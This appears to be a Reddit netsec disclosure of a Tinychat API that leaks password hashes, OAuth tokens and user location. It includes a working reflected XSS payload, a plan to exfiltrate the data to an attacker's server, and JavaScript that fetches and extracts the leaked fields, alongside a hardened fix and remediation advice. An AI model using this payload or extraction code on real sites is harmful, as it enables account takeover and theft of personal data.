Disclaimer:

I am only posting this in the hopes that it gets fixed. I am not (and have never been) comfortable with reporting vulnerabilities/exploits personally.

Too many of my friends have been threatened, sued, and/or lost their jobs for trying to help increase security awareness while being both responsible and non-destructive.

You are more than welcome (and encouraged) to report this vulnerability to Tinychat - hell, even try to get a bounty out of it.

Vulnerable users:

Anyone who is signed in to Tinychat - even with social media auth.

Overview:

I was looking through packets in Wireshark while on Tinychat, and I came across an HTTP request that was sent right after the Flash app loaded up. It looked a little strange, so I took a peeksie.

It looks like these are the authentication creds for the user to start broadcasting to the room (and obviously it sets up their account in the app).

What I DIDN'T expect to find was my username and my MD5'd password hanging out for the world to see (providing they had the same session as me).

Upon closer inspection I also came to find out that they store the username and password in a cookie and use that as the session identifier for the account....

...Which means that even if we can't find their unencrypted passwords we can still get on their accounts and pull any information we can get, which includes:

Username

MD5 of password

IP (plus a GeoIP block with city, region, postal code and lat/long, so their rough location for SE purposes comes for free)

Twitter
    oAuth token and token secret (if attached to account)
    Name
    ID

Facebook
    session token (if attached to account)
    Name
    ID

MySpace
    session token (if attached to account)
    ID

...Actually, why don't you just take a look (I made it look pretty).

<response
    referer=''
    result='OK'
    time='**************TIMESTAMP**************'
    name='tinychat^netsec'
    roomtype='default'
    rtmp='rtmp://69.65.43.160:443/tinyconf'
    cip='**************User IP Here**************'
    rt='**************'>
  <userinfo
      id="**************"
      added="**************"
      description=""
      facebook_id=""
      facebook_name=""
      facebook_session=""
      greenroom=""
      is_male="1"
      location=""
      loggedin="1"
      myspace_id=""
      myspace_session=""
      password="**************MD5 OF PASSWORD**************"
      showmods=""
      twfb="0"
      twitter_id=""
      twitter_name=""
      twitter_token=""
      twitter_token_secret=""
      username="**************"
      website="" />
  <geoip
      area_code="**************"
      city="**************"
      continent_code="NA"
      country="USA"
      country_name="United States"
      latitude="**************"
      longitude="**************"
      metro_code="**************"
      postal_code="**************"
      region="**************"
      region_name="**************"
      time_zone="America/New_York" />
</response>

Attack method(s):

1. The social engineer

Simply trick the user into copying the contents of the "vulnerable" page and pasting them into a textbox on a page you control; your page parses out the desired values and posts them to your server to play with later. This works because the API returns the details of whoever is logged in, so the victim fetches their own data for you.

2. The XSS

Find an XSS on the site and XHR to the "vulnerable" page, parse out the desired values, and post them back to your server. The XSS has to run on the tinychat.com origin for this to work: a same-origin XHR carries the victim's session cookies automatically and the script can read the response, neither of which a page on another origin gets.

URL:

GET: http://tinychat.com/api/find.room/{ROOM_NAME}?site=tinychat

Example: http://tinychat.com/api/find.room/netsec?site=tinychat
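What the parsing step of attack method #2 (or a defender's audit of the endpoint) actually has to do, as an added example that is not part of the original post or Tinychat's code. The sample response is constructed to match the redacted structure shown above; every value in it is a placeholder, and the list of "sensitive" attributes is my own choice of what should never leave the server.

```javascript
// Added example (not Tinychat's code). Parses a find.room XML response and
// reports which account-sensitive attributes are actually populated.

// Constructed sample; shape copied from the redacted response in the post,
// values are placeholders (the MD5 is md5("password")).
const SAMPLE_RESPONSE = `<response referer='' result='OK' time='1300000000'
  name='tinychat^netsec' roomtype='default'
  rtmp='rtmp://69.65.43.160:443/tinyconf' cip='203.0.113.7' rt='x'>
  <userinfo id="12345" added="1290000000" description="" facebook_id=""
    facebook_name="" facebook_session="" greenroom="" is_male="1" location=""
    loggedin="1" myspace_id="" myspace_session=""
    password="5f4dcc3b5aa765d61d8327deb882cf99" showmods="" twfb="0"
    twitter_id="4711" twitter_name="example_user" twitter_token="4711-abcdef"
    twitter_token_secret="s3cret" username="example_user" website="" />
  <geoip area_code="212" city="New York" continent_code="NA" country="USA"
    country_name="United States" latitude="40.7" longitude="-74.0"
    metro_code="501" postal_code="10001" region="NY" region_name="New York"
    time_zone="America/New_York" />
</response>`;

// Attributes that should never be handed to a client, keyed by element name
// (my selection, based on the fields visible in the post's response).
const SENSITIVE = {
  response: ["cip"],
  userinfo: ["username", "password", "facebook_session", "myspace_session",
             "twitter_token", "twitter_token_secret"],
  geoip: ["city", "region", "postal_code", "latitude", "longitude"],
};

// The response is flat and attribute-only, so a small regex parser is enough.
// It accepts both quote styles because the real response mixes them.
function decodeEntities(s) {
  const map = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'" };
  return s.replace(/&(amp|lt|gt|quot|apos);/g, (_, e) => map[e]);
}

function parseElements(xml) {
  const elements = {};
  const tagRe = /<(\w+)((?:\s+[\w:-]+\s*=\s*(?:"[^"]*"|'[^']*'))*)\s*\/?>/g;
  const attrRe = /([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/g;
  let m;
  while ((m = tagRe.exec(xml)) !== null) {
    const attrs = {};
    let a;
    while ((a = attrRe.exec(m[2])) !== null) {
      attrs[a[1]] = decodeEntities(a[2] !== undefined ? a[2] : a[3]);
    }
    elements[m[1]] = attrs;
  }
  return elements;
}

// Returns only the sensitive attributes that are non-empty, i.e. exactly what
// this particular response leaks, keyed as "element.attribute".
function extractLeaks(xml) {
  const elements = parseElements(xml);
  const leaks = {};
  for (const [el, names] of Object.entries(SENSITIVE)) {
    const attrs = elements[el] || {};
    for (const n of names) {
      if (attrs[n]) leaks[`${el}.${n}`] = attrs[n];
    }
  }
  return leaks;
}

// Relative URL so the request stays same-origin when run from an XSS on the
// site; the browser then attaches the victim's session cookies by itself.
function findRoomUrl(room) {
  return `/api/find.room/${encodeURIComponent(room)}?site=tinychat`;
}

// Browser-only: the fetch half of attack method #2 (not runnable under Node).
function fetchLeaks(room, cb) {
  const xhr = new XMLHttpRequest();
  xhr.open("GET", findRoomUrl(room));
  xhr.onload = () => cb(extractLeaks(xhr.responseText));
  xhr.send();
}
```

Run against the constructed sample, extractLeaks reports the username, the password hash, the Twitter token pair, the IP and the GeoIP location, and nothing for the empty Facebook and MySpace session fields. The same function run over a real capture is a quick way for the site's own staff to check whether an API response is clean.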

!!B-B-B-B-BONUS STAGE!!:

XSS (works in everything except Chrome - damn that XSS filter! :P ):

http://tinychat.com/embedmaker.html?room="/>Netsec.<script> function generate_embed(){ /* SEE NOTE BELOW */ } alert(0);</script>

Note: We redefine the page's own generate_embed() function as a no-op so the "Only alphanumeric characters allowed" alert never fires; that alert could otherwise tip the user off that they are visiting a malicious URL. The check is client-side only: the room value is still reflected into the page unencoded, which is what the "/> breakout relies on.
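The bug pattern behind the bonus XSS, shown on a stand-in for the reflecting page as an added example (not Tinychat's code; the input element, function names and the 64-character limit are assumptions). The unsafe renderer reproduces the attribute breakout the payload relies on; the hardened one enforces the alphanumeric rule where it matters, on the server, and encodes on output regardless.

```javascript
// Added example (not Tinychat's code): vulnerable reflection of ?room= into an
// HTML attribute next to a hardened version. Markup and names are assumptions.

// The payload from the post, in its decoded (post-URL-decoding) form.
const PAYLOAD =
  '"/>Netsec.<script> function generate_embed(){ } alert(0);</script>';

// Vulnerable: the parameter is concatenated straight into an attribute value,
// so a leading "/> closes the attribute and the tag and the rest is markup.
function renderEmbedUnsafe(room) {
  return '<input type="text" name="room" value="' + room + '">';
}

// Server-side allow-list. The page already promises "Only alphanumeric
// characters allowed", so enforce exactly that before the value is used.
function isValidRoomName(room) {
  return /^[A-Za-z0-9]{1,64}$/.test(room);
}

// Output encoding for an HTML attribute context: these five characters are
// the ones that can change the parse.
function escapeHtmlAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: reject anything outside the allow-list (the real page would
// answer 400), and encode anyway as defence in depth.
function renderEmbedSafe(room) {
  if (!isValidRoomName(room)) return null;
  return '<input type="text" name="room" value="' + escapeHtmlAttr(room) + '">';
}

// Crude check used to contrast the two renderers: does a live <script> start
// tag appear in the fragment?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}
```

A browser-side filter like Chrome's (the reason the payload "works in everything except Chrome") is not a fix: it only catches reflections it can recognise, and the other browsers in the post run the payload as written.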

So there we have it, /r/netsec/. Combine the XSS with attack method #2 and we've got the user's username, the MD5 of their password, and every other field in the response listed above.

Since Tinychat now offers a paid service for HD video and other small UI enhancements this is kind of stupid that they wouldn't secure their shit.

...Then again I might just be being an asshole.

For Tinychat staff that may or may not read this:

Remove ALL portions of your code that output account information. This includes a few URLs in your /api/ directory and also the username and password cookies. Concretely: find.room (and anything like it) should not return the password hash, the social-network OAuth tokens or the caller's IP; the session should be a random, opaque token in an HttpOnly cookie rather than the username and password hash; and passwords should be stored with a salted, deliberately slow hash rather than unsalted MD5.

It took me under a minute to find the XSS listed above - I'm sure there are more of them.

Thanks for reading, fellas.